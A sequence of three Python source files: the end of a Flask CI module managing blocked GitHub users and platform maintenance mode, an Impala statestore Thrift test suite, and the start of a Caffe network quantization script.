log.error('GitHub PR Comment Failed for Test_id: {test_id} with Exception {e}'.format(test_id=test_id, e=e))
@mod_ci.route('/show_maintenance')
@login_required
@check_access_rights([Role.admin])
@template_renderer('ci/maintenance.html')
def show_maintenance():
"""
Get list of Virtual Machines under maintenance.
:return: platforms in maintenance
:rtype: dict
"""
return {
'platforms': MaintenanceMode.query.all()
}
@mod_ci.route('/blocked_users', methods=['GET', 'POST'])
@login_required
@check_access_rights([Role.admin])
@template_renderer()
def blocked_users():
"""
Render the blocked_users template.
This returns a list of all currently blacklisted users.
Also defines processing of forms to add/remove users from blacklist.
When a user is added to blacklist, removes queued tests on any PR by the user.
"""
blocked_users = BlockedUsers.query.order_by(BlockedUsers.user_id)
# Initialize usernames dictionary
usernames = {u.user_id: 'Error, cannot get username' for u in blocked_users}
for key in usernames.keys():
# Fetch usernames from GitHub API
try:
api_url = requests.get('https://api.github.com/user/{}'.format(key), timeout=10)
userdata = api_url.json()
# Set values to the actual usernames if no errors
usernames[key] = userdata['login']
except requests.exceptions.RequestException:
break
# Define addUserForm processing
add_user_form = AddUsersToBlacklist()
if add_user_form.add.data and add_user_form.validate_on_submit():
if BlockedUsers.query.filter_by(user_id=add_user_form.user_id.data).first() is not None:
flash('User already blocked.')
return redirect(url_for('.blocked_users'))
blocked_user = BlockedUsers(add_user_form.user_id.data, add_user_form.comment.data)
g.db.add(blocked_user)
g.db.commit()
flash('User blocked successfully.')
try:
# Remove any queued pull request from blocked user
gh = GitHub(access_token=g.github['bot_token'])
repository = gh.repos(g.github['repository_owner'])(g.github['repository'])
# Getting all pull requests by blocked user on the repo
pulls = repository.pulls.get()
for pull in pulls:
if pull['user']['id'] != add_user_form.user_id.data:
continue
tests = Test.query.filter(Test.pr_nr == pull['number']).all()
for test in tests:
# Add canceled status only if the test hasn't started yet
if len(test.progress) > 0:
continue
progress = TestProgress(test.id, TestStatus.canceled, "PR closed", datetime.datetime.now())
g.db.add(progress)
g.db.commit()
try:
repository.statuses(test.commit).post(
state=Status.FAILURE,
description="Tests canceled since user blacklisted",
context="CI - {name}".format(name=test.platform.value),
target_url=url_for('test.by_id', test_id=test.id, _external=True)
)
except ApiError as a:
g.log.error('Got an exception while posting to GitHub! Message: {message}'.format(
message=a.message))
except ApiError as a:
g.log.error('Pull Requests of Blocked User could not be fetched: {res}'.format(res=a.response))
return redirect(url_for('.blocked_users'))
# Define removeUserForm processing
remove_user_form = RemoveUsersFromBlacklist()
if remove_user_form.remove.data and remove_user_form.validate_on_submit():
blocked_user = BlockedUsers.query.filter_by(user_id=remove_user_form.user_id.data).first()
if blocked_user is None:
flash('No such user in Blacklist')
return redirect(url_for('.blocked_users'))
g.db.delete(blocked_user)
g.db.commit()
flash('User removed successfully.')
return redirect(url_for('.blocked_users'))
return{
'addUserForm': add_user_form,
'removeUserForm': remove_user_form,
'blocked_users': blocked_users,
'usernames': usernames
}
@mod_ci.route('/toggle_maintenance/<platform>/<status>')
@login_required
@check_access_rights([Role.admin])
def toggle_maintenance(platform, status):
"""
Toggle maintenance mode for a platform.
:param platform: name of the platform
:type platform: str
:param status: current maintenance status
:type status: str
:return: success response if successful, failure response otherwise
:rtype: JSON
"""
result = 'failed'
message = 'Platform Not found'
disabled = status == 'True'
try:
platform = TestPlatform.from_string(platform)
db_mode = MaintenanceMode.query.filter(MaintenanceMode.platform == platform).first()
if db_mode is not None:
db_mode.disabled = disabled
g.db.commit()
result = 'success'
message = f'{platform.description} in maintenance? {"Yes" if disabled else "No"}'
except ValueError:
pass
return jsonify({
'status': result,
'message': message
})
@mod_ci.route('/maintenance-mode/<platform>')
def in_maintenance_mode(platform):
"""
Check if platform in maintenance mode.
:param platform: name of the platform
:type platform: str
:return: status of the platform
:rtype: str
"""
try:
platform = TestPlatform.from_string(platform)
except ValueError:
return 'ERROR'
status = MaintenanceMode.query.filter(MaintenanceMode.platform == platform).first()
if status is None:
status = MaintenanceMode(platform, False)
g.db.add(status)
g.db.commit()
return str(status.disabled)
def is_main_repo(repo_url) -> bool:
"""
Check whether a repo_url links to the main repository or not.
:param repo_url: url of fork/main repository of the user
:type repo_url: str
:return: checks whether url of main repo is same or not
:rtype: bool
"""
from run import config, get_github_config
gh_config = get_github_config(config)
return f'{gh_config["repository_owner"]}/{gh_config["repository"]}' in repo_url
def add_customized_regression_tests(test_id) -> None:
"""
Run custom regression tests.
:param test_id: id of the test
:type test_id: int
"""
active_regression_tests = RegressionTest.query.filter(RegressionTest.active == 1).all()
for regression_test in active_regression_tests:
g.log.debug(f'Adding RT #{regression_test.id} to test {test_id}')
customized_test = CustomizedTest(test_id, regression_test.id)
g.db.add(customized_test)
g.db.commit()
|
test_statestore.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from collections import defaultdict
import json
import logging
import socket
import threading
import traceback
import time
import urllib2
import uuid
from Types.ttypes import TNetworkAddress
from thrift.protocol import TBinaryProtocol
from thrift.server.TServer import TServer
from thrift.transport import TSocket
from thrift.transport import TTransport
import StatestoreService.StatestoreSubscriber as Subscriber
import StatestoreService.StatestoreService as Statestore
from StatestoreService.StatestoreSubscriber import TUpdateStateResponse
from StatestoreService.StatestoreSubscriber import TTopicRegistration
from ErrorCodes.ttypes import TErrorCode
from Status.ttypes import TStatus
from tests.common.environ import specific_build_type_timeout
LOG = logging.getLogger('test_statestore')
# Tests for the statestore. The StatestoreSubscriber class is a skeleton implementation of
# a Python-based statestore subscriber with additional hooks to allow testing. Each
# StatestoreSubscriber runs its own server so that the statestore may contact it.
#
# All tests in this file may be run in parallel. They assume that a statestore instance is
# already running, and is configured with out-of-the-box defaults (as is the case in our
# usual test environment) which govern failure-detector timeouts etc.
#
# These tests do not yet provide sufficient coverage.
# If no topic entries, do the first and second subscribers always get a callback?
# Adding topic entries to non-existant topic
# Test for from_version and to_version behavior
# Test with many concurrent subscribers
# Test that only the subscribed-to topics are sent
# Test that topic deletions take effect correctly.
def get_statestore_subscribers(host='localhost', port=25010):
response = urllib2.urlopen("http://{0}:{1}/subscribers?json".format(host, port))
page = response.read()
return json.loads(page)
STATUS_OK = TStatus(TErrorCode.OK)
DEFAULT_UPDATE_STATE_RESPONSE = TUpdateStateResponse(status=STATUS_OK, topic_updates=[],
skipped=False)
# IMPALA-3501: the timeout needs to be higher in code coverage builds
WAIT_FOR_FAILURE_TIMEOUT = specific_build_type_timeout(40, code_coverage_build_timeout=60)
class WildcardServerSocket(TSocket.TSocketBase, TTransport.TServerTransportBase):
"""Specialised server socket that binds to a random port at construction"""
def __init__(self, host=None, port=0):
self.host = host
self.handle = None
self.handle = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.handle.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.handle.bind(('localhost', 0))
_, self.port = self.handle.getsockname()
def listen(self):
self.handle.listen(128)
def accept(self):
client, addr = self.handle.accept()
result = TSocket.TSocket()
result.setHandle(client)
return result
class KillableThreadedServer(TServer):
"""Based on TServer.TThreadedServer, this server may be shutdown (by calling
shutdown()), after which no new connections may be made. Most of the implementation is
directly copied from Thrift."""
def __init__(self, *args, **kwargs):
TServer.__init__(self, *args)
self.daemon = kwargs.get("daemon", False)
self.is_shutdown = False
self.port = self.serverTransport.port
def shutdown(self):
self.is_shutdown = True
self.serverTransport.close()
self.wait_until_down()
def wait_until_up(self, num_tries=10):
for i in xrange(num_tries):
cnxn = TSocket.TSocket('localhost', self.port)
try:
cnxn.open()
return
except Exception, e:
if i == num_tries - 1: raise
time.sleep(0.1)
def wait_until_down(self, num_tries=10):
for i in xrange(num_tries):
cnxn = TSocket.TSocket('localhost', self.port)
try:
cnxn.open()
time.sleep(0.1)
except Exception, e:
return
raise Exception("Server did not stop")
def serve(self):
self.serverTransport.listen()
while not self.is_shutdown:
client = self.serverTransport.accept()
# Since accept() can take a while, check again if the server is shutdown to avoid
# starting an unnecessary thread.
if self.is_shutdown: return
t = threading.Thread(target=self.handle, args=(client,))
t.setDaemon(self.daemon)
t.start()
def handle(self, client):
itrans = self.inputTransportFactory.getTransport(client)
otrans = self.outputTransportFactory.getTransport(client)
iprot = self.inputProtocolFactory.getProtocol(itrans)
oprot = self.outputProtocolFactory.getProtocol(otrans)
try:
while not self.is_shutdown:
self.processor.process(iprot, oprot)
except TTransport.TTransportException, tx:
pass
except Exception, x:
print x
itrans.close()
otrans.close()
class StatestoreSubscriber(object):
"""A bare-bones subscriber skeleton. Tests should create a new StatestoreSubscriber(),
call start() and then register(). The subscriber will run a Thrift server on an unused
port, and after registration the statestore will call Heartbeat() and UpdateState() via
RPC. Tests can provide callbacks to the constructor that will be called during those
RPCs, and this is the easiest way to check that the statestore protocol is being
correctly followed. Tests should use wait_for_* methods to confirm that some event (like
an RPC call) has happened asynchronously.
Since RPC callbacks will execute on a different thread from the main one, any assertions
there will not trigger a test failure without extra plumbing. What we do is simple: any
exceptions during an RPC are caught and stored, and the check_thread_exceptions() method
will re-raise them.
The methods that may be called by a test deliberately return 'self' to allow for
chaining, see test_failure_detected() for an example of how this makes the test flow
more readable."""
def __init__(self, heartbeat_cb=None, update_cb=None):
self.heartbeat_event, self.heartbeat_count = threading.Condition(), 0
# Track the number of updates received per topic.
self.update_counts = defaultdict(lambda : 0)
# Variables to notify for updates on each topic.
self.update_event = threading.Condition()
self.heartbeat_cb, self.update_cb = heartbeat_cb, update_cb
self.subscriber_id = "python-test-client-%s" % uuid.uuid1()
self.exception = None
def Heartbeat(self, args):
"""Heartbeat RPC handler. Calls heartbeat callback if one exists."""
self.heartbeat_event.acquire()
try:
self.heartbeat_count += 1
response = Subscriber.THeartbeatResponse()
if self.heartbeat_cb is not None and self.exception is None:
try:
response = self.heartbeat_cb(self, args)
except Exception, e:
self.exception = e
self.heartbeat_event.notify()
finally:
self.heartbeat_event.release()
return response
def UpdateState(self, args):
"""UpdateState RPC handler. Calls update callback if one exists."""
self.update_event.acquire()
try:
for topic_name in args.topic_deltas: self.update_counts[topic_name] += 1
response = DEFAULT_UPDATE_STATE_RESPONSE
if self.update_cb is not None and self.exception is None:
try:
response = self.update_cb(self, args)
except Exception, e:
# Print the original backtrace so it doesn't get lost.
traceback.print_exc()
self.exception = e
self.update_event.notify()
finally:
self.update_event.release()
return response
def __init_server(self):
processor = Subscriber.Processor(self)
transport = WildcardServerSocket()
tfactory = TTransport.TBufferedTransportFactory()
pfactory = TBinaryProtocol.TBinaryProtocolFactory()
self.server = KillableThreadedServer(processor, transport, tfactory, pfactory,
daemon=True)
self.server_thread = threading.Thread(target=self.server.serve)
self.server_thread.setDaemon(True)
self.server_thread.start()
self.server.wait_until_up()
self.port = self.server.port
def __init_client(self):
self.client_transport = \
TTransport.TBufferedTransport(TSocket.TSocket('localhost', 24000))
self.protocol = TBinaryProtocol.TBinaryProtocol(self.client_transport)
self.client = Statestore.Client(self.protocol)
self.client_transport.open()
def check_thread_exceptions(self):
"""Checks if an exception was raised and stored in a callback thread"""
if self.exception is not None: raise self.exception
def kill(self):
"""Closes both the server and client sockets, and waits for the server to become
unavailable"""
self.client_transport.close()
self.server.shutdown()
return self
def start(self):
"""Starts a subscriber server, and opens a client to the statestore. Returns only when
the server is running."""
self.__init_server()
self.__init_client()
return self
def register(self, topics=None):
"""Call the Register() RPC"""
if topics is None: topics = []
request = Subscriber.TRegisterSubscriberRequest(
topic_registrations=topics,
subscriber_location=TNetworkAddress("localhost", self.port),
subscriber_id=self.subscriber_id)
response = self.client.RegisterSubscriber(request)
if response.status.status_code == TErrorCode.OK:
self.registration_id = response.registration_id
else:
raise Exception("Registration failed: %s, %s" %
(response.status.status_code,
'\n'.join(response.status.error_msgs)))
return self
def wait_for_heartbeat(self, count=None):
"""Waits for some number of heartbeats. If 'count' is provided, waits until the number
of heartbeats seen by this subscriber exceeds count, otherwise waits for one further
heartbeat."""
self.heartbeat_event.acquire()
try:
if count is not None and self.heartbeat_count >= count: return self
if count is None: count = self.heartbeat_count + 1
while count > self.heartbeat_count:
self.check_thread_exceptions()
last_count = self.heartbeat_count
self.heartbeat_event.wait(10)
if last_count == self.heartbeat_count:
raise Exception("Heartbeat not received within 10s (heartbeat count: %s)" %
self.heartbeat_count)
self.check_thread_exceptions()
return self
finally:
self.heartbeat_event.release()
def wait_for_update(self, topic_name, count=None):
"""Waits for some number of updates of 'topic_name'. If 'count' is provided, waits
until the number updates seen by this subscriber exceeds count, otherwise waits
for one further update."""
self.update_event.acquire()
start_time = time.time()
try:
if count is not None and self.update_counts[topic_name] >= count: return self
if count is None: count = self.update_counts[topic_name] + 1
while count > self.update_counts[topic_name]:
self.check_thread_exceptions()
last_count = self.update_counts[topic_name]
self.update_event.wait(10)
if (time.time() > start_time + 10 and
last_count == self.update_counts[topic_name]):
raise Exception("Update not received for %s within 10s (update count: %s)" %
(topic_name, last_count))
self.check_thread_exceptions()
return self
finally:
self.update_event.release()
def wait_for_failure(self, timeout=WAIT_FOR_FAILURE_TIMEOUT):
"""Waits until this subscriber no longer appears in the statestore's subscriber
list. If 'timeout' seconds pass, throws an exception."""
start = time.time()
while time.time() - start < timeout:
subs = [s["id"] for s in get_statestore_subscribers()["subscribers"]]
if self.subscriber_id not in subs: return self
time.sleep(0.2)
raise Exception("Subscriber %s did not fail in %ss" % (self.subscriber_id, timeout))
class TestStatestore():
def make_topic_update(self, topic_name, key_template="foo", value_template="bar",
num_updates=1, clear_topic_entries=False):
topic_entries = [
Subscriber.TTopicItem(key=key_template + str(x), value=value_template + str(x))
for x in xrange(num_updates)]
return Subscriber.TTopicDelta(topic_name=topic_name,
topic_entries=topic_entries,
is_delta=False,
clear_topic_entries=clear_topic_entries)
def test_registration_ids_different(self):
"""Test that if a subscriber with the same id registers twice, the registration ID is
different"""
sub = StatestoreSubscriber()
sub.start().register()
old_reg_id = sub.registration_id
sub.register()
assert old_reg_id != sub.registration_id
def test_receive_heartbeats(self):
"""Smoke test to confirm that heartbeats get sent to a correctly registered
subscriber"""
sub = StatestoreSubscriber()
sub.start().register().wait_for_heartbeat(5)
def test_receive_updates(self):
"""Test that updates are correctly received when a subscriber alters a topic"""
topic_name = "topic_delta_%s" % uuid.uuid1()
def topic_update_correct(sub, args):
delta = self.make_topic_update(topic_name)
update_count = sub.update_counts[topic_name]
if topic_name not in args.topic_deltas:
# The update doesn't contain our topic.
pass
elif update_count == 1:
return TUpdateStateResponse(status=STATUS_OK, topic_updates=[delta],
skipped=False)
elif update_count == 2:
assert len(args.topic_deltas) == 1, args.topic_deltas
assert args.topic_deltas[topic_name].topic_entries == delta.topic_entries
assert args.topic_deltas[topic_name].topic_name == delta.topic_name
elif update_count == 3:
# After the content-bearing update was processed, the next delta should be empty
assert len(args.topic_deltas[topic_name].topic_entries) == 0
return DEFAULT_UPDATE_STATE_RESPONSE
sub = StatestoreSubscriber(update_cb=topic_update_correct)
reg = TTopicRegistration(topic_name=topic_name, is_transient=False)
(
sub.start()
.register(topics=[reg])
.wait_for_update(topic_name, 3)
)
def test_update_is_delta(self):
"""Test that the 'is_delta' flag is correctly set. The first update for a topic should
always not be a delta, and so should all subsequent updates until the subscriber says
it has not skipped the update."""
topic_name = "test_update_is_delta_%s" % uuid.uuid1()
def check_delta(sub, args):
update_count = sub.update_counts[topic_name]
if topic_name not in args.topic_deltas:
# The update doesn't contain our topic.
pass
elif update_count == 1:
assert args.topic_deltas[topic_name].is_delta == False
delta = self.make_topic_update(topic_name)
return TUpdateStateResponse(status=STATUS_OK, topic_updates=[delta],
skipped=False)
elif update_count == 2:
assert args.topic_deltas[topic_name].is_delta == False
elif update_count == 3:
assert args.topic_deltas[topic_name].is_delta == True
assert len(args.topic_deltas[topic_name].topic_entries) == 0
assert args.topic_deltas[topic_name].to_version == 1
return DEFAULT_UPDATE_STATE_RESPONSE
sub = StatestoreSubscriber(update_cb=check_delta)
reg = TTopicRegistration(topic_name=topic_name, is_transient=False)
(
sub.start()
.register(topics=[reg])
.wait_for_update(topic_name, 3)
)
def test_skipped(self):
"""Test that skipping an update causes it to be resent"""
topic_name = "test_skipped_%s" % uuid.uuid1()
def check_skipped(sub, args):
# Ignore responses that don't contain our topic.
if topic_name not in args.topic_deltas: return DEFAULT_UPDATE_STATE_RESPONSE
update_count = sub.update_counts[topic_name]
if update_count == 1:
update = self.make_topic_update(topic_name)
return TUpdateStateResponse(status=STATUS_OK, topic_updates=[update],
skipped=False)
# All subsequent updates: set skipped=True and expected the full topic to be resent
# every time
assert args.topic_deltas[topic_name].is_delta == False
assert len(args.topic_deltas[topic_name].topic_entries) == 1
return TUpdateStateResponse(status=STATUS_OK, skipped=True)
sub = StatestoreSubscriber(update_cb=check_skipped)
reg = TTopicRegistration(topic_name=topic_name, is_transient=False)
(
sub.start()
.register(topics=[reg])
.wait_for_update(topic_name, 3)
)
def test_failure_detected(self):
sub = StatestoreSubscriber()
topic_name = "test_failure_detected"
reg = TTopicRegistration(topic_name=topic_name, is_transient=True)
(
sub.start()
.register(topics=[reg])
.wait_for_update(topic_name, 1)
.kill()
.wait_for_failure()
)
def test_hung_heartbeat(self):
"""Test for IMPALA-1712: If heartbeats hang (which we simulate by sleeping for five
minutes) the statestore should time them out every 3s and then eventually fail after
40s (10 times (3 + 1), where the 1 is the inter-heartbeat delay)"""
sub = StatestoreSubscriber(heartbeat_cb=lambda sub, args: time.sleep(300))
topic_name = "test_hung_heartbeat"
reg = TTopicRegistration(topic_name=topic_name, is_transient=True)
(
sub.start()
.register(topics=[reg])
.wait_for_update(topic_name, 1)
.wait_for_failure(timeout=60)
)
def test_topic_persistence(self):
"""Test that persistent topic entries survive subscriber failure, but transent topic
entries are erased when the associated subscriber fails"""
topic_id = str(uuid.uuid1())
persistent_topic_name = "test_topic_persistence_persistent_%s" % topic_id
transient_topic_name = "test_topic_persistence_transient_%s" % topic_id
def add_entries(sub, args):
# None of, one or both of the topics may be in the update.
updates = []
if (persistent_topic_name in args.topic_deltas and
sub.update_counts[persistent_topic_name] == 1):
updates.append(self.make_topic_update(persistent_topic_name))
if (transient_topic_name in args.topic_deltas and
sub.update_counts[transient_topic_name] == 1):
updates.append(self.make_topic_update(transient_topic_name))
if len(updates) > 0:
return TUpdateStateResponse(status=STATUS_OK, topic_updates=updates,
skipped=False)
return DEFAULT_UPDATE_STATE_RESPONSE
def check_entries(sub, args):
# None of, one or both of the topics may be in the update.
if (persistent_topic_name in args.topic_deltas and
sub.update_counts[persistent_topic_name] == 1):
assert len(args.topic_deltas[persistent_topic_name].topic_entries) == 1
# Statestore should not send deletions when the update is not a delta, see
# IMPALA-1891
assert args.topic_deltas[persistent_topic_name].topic_entries[0].deleted == False
if (transient_topic_name in args.topic_deltas and
sub.update_counts[persistent_topic_name] == 1):
assert len(args.topic_deltas[transient_topic_name].topic_entries) == 0
return DEFAULT_UPDATE_STATE_RESPONSE
reg = [TTopicRegistration(topic_name=persistent_topic_name, is_transient=False),
TTopicRegistration(topic_name=transient_topic_name, is_transient=True)]
sub = StatestoreSubscriber(update_cb=add_entries)
(
sub.start()
.register(topics=reg)
.wait_for_update(persistent_topic_name, 2)
.wait_for_update(transient_topic_name, 2)
.kill()
.wait_for_failure()
)
sub2 = StatestoreSubscriber(update_cb=check_entries)
(
sub2.start()
.register(topics=reg)
.wait_for_update(persistent_topic_name, 1)
.wait_for_update(transient_topic_name, 1)
)
def test_update_with_clear_entries_flag(self):
"""Test that the statestore clears all topic entries when a subscriber
sets the clear_topic_entries flag in a topic update message (IMPALA-6948)."""
topic_name = "test_topic_%s" % str(uuid.uuid1())
def add_entries(sub, args):
updates = []
if (topic_name in args.topic_deltas and sub.update_counts[topic_name] == 1):
updates.append(self.make_topic_update(topic_name, num_updates=2,
key_template="old"))
if (topic_name in args.topic_deltas and sub.update_counts[topic_name] == 2):
updates.append(self.make_topic_update(topic_name, num_updates=1,
key_template="new", clear_topic_entries=True))
if len(updates) > 0:
return TUpdateStateResponse(status=STATUS_OK, topic_updates=updates,
skipped=False)
return DEFAULT_UPDATE_STATE_RESPONSE
def check_entries(sub, args):
if (topic_name in args.topic_deltas and sub.update_counts[topic_name] == 1):
assert len(args.topic_deltas[topic_name].topic_entries) == 1
assert args.topic_deltas[topic_name].topic_entries[0].key == "new0"
return DEFAULT_UPDATE_STATE_RESPONSE
reg = [TTopicRegistration(topic_name=topic_name, is_transient=False)]
sub1 = StatestoreSubscriber(update_cb=add_entries)
(
sub1.start()
.register(topics=reg)
.wait_for_update(topic_name, 1)
.kill()
.wait_for_failure()
.start()
.register(topics=reg)
.wait_for_update(topic_name, 1)
)
sub2 = StatestoreSubscriber(update_cb=check_entries)
(
sub2.start()
.register(topics=reg)
.wait_for_update(topic_name, 2)
)
def test_heartbeat_failure_reset(self):
"""Regression test for IMPALA-6785: the heartbeat failure count for the subscriber ID
should be reset when it resubscribes, not after the first successful heartbeat. Delay
the heartbeat to force the topic update to finish first."""
sub = StatestoreSubscriber(heartbeat_cb=lambda sub, args: time.sleep(0.5))
topic_name = "test_heartbeat_failure_reset"
reg = TTopicRegistration(topic_name=topic_name, is_transient=True)
sub.start()
sub.register(topics=[reg])
LOG.info("Registered with id {0}".format(sub.subscriber_id))
sub.wait_for_heartbeat(1)
sub.kill()
LOG.info("Killed, waiting for statestore to detect failure via heartbeats")
sub.wait_for_failure()
# IMPALA-6785 caused only one topic update to be send. Wait for multiple updates to
# be received to confirm that the subsequent updates are being scheduled repeatedly.
target_updates = sub.update_counts[topic_name] + 5
sub.start()
sub.register(topics=[reg])
LOG.info("Re-registered with id {0}, waiting for update".format(sub.subscriber_id))
sub.wait_for_update(topic_name, target_updates)
|
quantize_c3d.py | #!/usr/bin/env python
# --------------------------------------------------------
# Quantize Fast R-CNN based Network
# Written by Chia-Chi Tsai
# --------------------------------------------------------
"""Quantize a Fast R-CNN network on an image database."""
import os
os.environ['GLOG_minloglevel'] = '2'
import _init_paths
from fast_rcnn.test import test_net, test_net_silent, im_detect
from fast_rcnn.config import cfg, cfg_from_file, cfg_from_list
from datasets.factory import get_imdb
import caffe
import argparse
import pprint
import time, os, sys
import numpy as np
from caffe.proto import caffe_pb2
import google.protobuf.text_format as txtf
import math
import cv2
from utils.timer import Timer
import multiprocessing
import json
import shutil
import warnings
warnings.filterwarnings("ignore")
from utils.timer import Timer
from subprocess import check_output
def parse_args():
"""
Parse input arguments
"""
parser = argparse.ArgumentParser(description='Quantize a C3D network')
parser.add_argument('--gpu', dest='gpu_id', help='GPU id to use',
default=0, type=int)
parser.add_argument('--def', dest='prototxt',
help='prototxt file defining the network',
default=None, type=str)
parser.add_argument('--def_quant', dest='prototxt_quantized',
help='quantized prototxt file defining the network',
default=None, type=str)
parser.add_argument('--def_quant_BAC', dest='prototxt_quantized_BAC',
help='quantized prototxt file defining the network',
default=None, type=str)
parser.add_argument('--act_analysis', dest='act_analysis',
help='input and output analysis file',
default=None, type=str)
parser.add_argument('--accumulator_analysis', dest='accumulator_analysis',
help='adder and multiplier analysis file',
default=None, type=str)
parser.add_argument('--net', dest='caffemodel',
help='model to test',
default=None, type=str)
parser.add_argument('--cfg', dest='cfg_file',
help='optional config file', default=None, type=str)
parser.add_argument('--imdb', dest='imdb_name',
help='dataset to test',
default='voc_2007_test', type=str)
parser.add_argument('--comp', dest='comp_mode', help='competition mode',
action='store_true')
parser.add_argument('--set', dest='set_cfgs',
help='set config keys', default=None,
nargs=argparse.REMAINDER)
parser.add_argument('--video', dest='video', help='video',
default='RearGoProDay97.mp4', type=str)
parser.add_argument('--vis', dest='vis', help='visualize detections',
action='store_true')
parser.add_argument('--num_dets', dest='max_per_image',
help='max number of detections per image',
default=100, type=int)
parser.add_argument('--error_margin', dest='error_margin',
help='tolerance error of quantized network',
default=0.1, type=float)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
return args
def analyze_network(net_proto):
has_fc = False
has_deconv = False
has_conv = False
has_ndconv = False
for l in net_proto.layer:
if l.type == 'Convolution':
has_conv = True
elif l.type == 'Deconvolution':
has_deconv = True
elif l.type =='InnerProduct':
has_fc = True
elif l.type =='NdConvolution':
has_ndconv = True
return has_conv, has_deconv, has_fc, has_ndconv
# convert network to quantized network with 32 bit width
def convert_net_to_qnet(ori_net_path, q_net_path):
net_proto = read_from_prototxt(ori_net_path)
new_blob_name = {}
for l in net_proto.layer:
for i in range(len(l.top)):
for j in range(len(l.bottom)):
if l.top[i] == l.bottom[j]:
if not l.top[i] in new_blob_name.keys():
new_blob_name[l.top[i]]=l.top[i]+'/t'
else:
l.bottom[j] = new_blob_name[l.bottom[j]]
new_blob_name[l.top[i]]=new_blob_name[l.top[i]]+'/t'
l.top[i] = new_blob_name[l.top[i]]
else:
for k in range(len(l.bottom)):
if l.bottom[k] in new_blob_name.keys():
l.bottom[k] = new_blob_name[l.bottom[k]]
if l.type == 'Convolution':
l.type = 'ConvolutionIVS'
l.quantization_param.precision = 0 #DYNAMIC_FIXED_POINT
l.quantization_param.bw_layer_in = 32
l.quantization_param.bw_layer_out = 32
l.quantization_param.bw_params = 32
l.quantization_param.fl_layer_in = 16
l.quantization_param.fl_layer_out= 16
l.quantization_param.fl_params = 16
l.quantization_param.rounding_time = 0
elif l.type =='InnerProduct':
l.type = 'FcIVS'
l.quantization_param.precision = 0 #DYNAMIC_FIXED_POINT
l.quantization_param.bw_layer_in = 32
l.quantization_param.bw_layer_out = 32
l.quantization_param.bw_params = 32
l.quantization_param.fl_layer_in = 16
l.quantization_param.fl_layer_out= 16
l.quantization_param.fl_params = 16
l.quantization_param.rounding_time = 0
elif l.type =='Deconvolution':
l.type = 'DeconvolutionRistretto'
l.quantization_param.precision = 0 #DYNAMIC_FIXED_POINT
l.quantization_param.bw_layer_in = 32
l.quantization_param.bw_layer_out = 32
l.quantization_param.bw_params = 32
l.quantization_param.fl_layer_in = 16
l.quantization_param.fl_layer_out= 16
l.quantization_param.fl_params = 16
l.quantization_param.rounding_time = 0
elif l.type =='NdConvolution':
l.type = 'NdConvolutionIVS'
l.quantization_param.precision = 0 #DYNAMIC_FIXED_POINT
l.quantization_param.bw_layer_in = 32
l.quantization_param.bw_layer_out = 32
l.quantization_param.bw_params = 32
l.quantization_param.fl_layer_in = 16
l.quantization_param.fl_layer_out= 16
l.quantization_param.fl_params = 16
l.quantization_param.rounding_time = 0
write_to_prototxt(net_proto, q_net_path)
# convert network to quantized network with 32 bit width
def convert_net_to_qnet_BAC_analysis(ori_net_path, q_net_path):
net_proto = read_from_prototxt(ori_net_path)
new_blob_name = {}
for l in net_proto.layer:
for i in range(len(l.top)):
for j in range(len(l.bottom)):
if l.top[i] == l.bottom[j]:
if not l.top[i] in new_blob_name.keys():
new_blob_name[l.top[i]]=l.top[i]+'/t'
else:
l.bottom[j] = new_blob_name[l.bottom[j]]
new_blob_name[l.top[i]]=new_blob_name[l.top[i]]+'/t'
l.top[i] = new_blob_name[l.top[i]]
else:
for k in range(len(l.bottom)):
if l.bottom[k] in new_blob_name.keys():
l.bottom[k] = new_blob_name[l.bottom[k]]
if l.type == 'Convolution' or l.type == 'ConvolutionIVS':
l.type = 'ConvolutionIVS'
l.quantization_param.precision = 0 #DYNAMIC_FIXED_POINT
l.quantization_param.bw_add = 32
l.quantization_param.bw_multiply = 32
l.quantization_param.fl_add = 16
l.quantization_param.fl_multiply = 16
l.quantization_param.rounding_time = 1
l.quantization_param.analyze_mode = 3
if l.type == 'InnerProduct' or l.type == 'FcIVS':
l.type = 'FcIVS'
l.quantization_param.precision = 0 #DYNAMIC_FIXED_POINT
l.quantization_param.bw_add = 32
l.quantization_param.bw_multiply = 32
l.quantization_param.fl_add = 16
l.quantization_param.fl_multiply = 16
l.quantization_param.rounding_time = 1
l.quantization_param.analyze_mode = 3
write_to_prototxt(net_proto, q_net_path)
def convert_net_to_qnet_BAC(ori_net_path, q_net_path):
net_proto = read_from_prototxt(ori_net_path)
new_blob_name = {}
for l in net_proto.layer:
for i in range(len(l.top)):
for j in range(len(l.bottom)):
if l.top[i] == l.bottom[j]:
if not l.top[i] in new_blob_name.keys():
new_blob_name[l.top[i]]=l.top[i]+'/t'
else:
l.bottom[j] = new_blob_name[l.bottom[j]]
new_blob_name[l.top[i]]=new_blob_name[l.top[i]]+'/t'
l.top[i] = new_blob_name[l.top[i]]
else:
for k in range(len(l.bottom)):
if l.bottom[k] in new_blob_name.keys():
l.bottom[k] = new_blob_name[l.bottom[k]]
if l.type == 'Convolution' or l.type == 'ConvolutionIVS':
l.type = 'ConvolutionIVS'
l.quantization_param.analyze_mode = 0
l.quantization_param.rounding_time = 1
if l.type == 'InnerProduct' or l.type == 'FcIVS':
l.type = 'FcIVS'
l.quantization_param.analyze_mode = 0
l.quantization_param.rounding_time = 1
write_to_prototxt(net_proto, q_net_path)
#change single layer bit width
def change_layer_bw(net_proto, layer_name,
bw_layer_in, fl_layer_in,
bw_layer_out, fl_layer_out,
bw_params, fl_params,
bw_add, fl_add,
bw_multiply, fl_multiply):
for l in net_proto.layer:
if l.name == layer_name:
l.quantization_param.precision = 0
l.quantization_param.bw_layer_in = int(bw_layer_in)
l.quantization_param.bw_layer_out = int(bw_layer_out)
l.quantization_param.bw_params = int(bw_params)
l.quantization_param.bw_add = int(bw_add)
l.quantization_param.bw_multiply = int(bw_multiply)
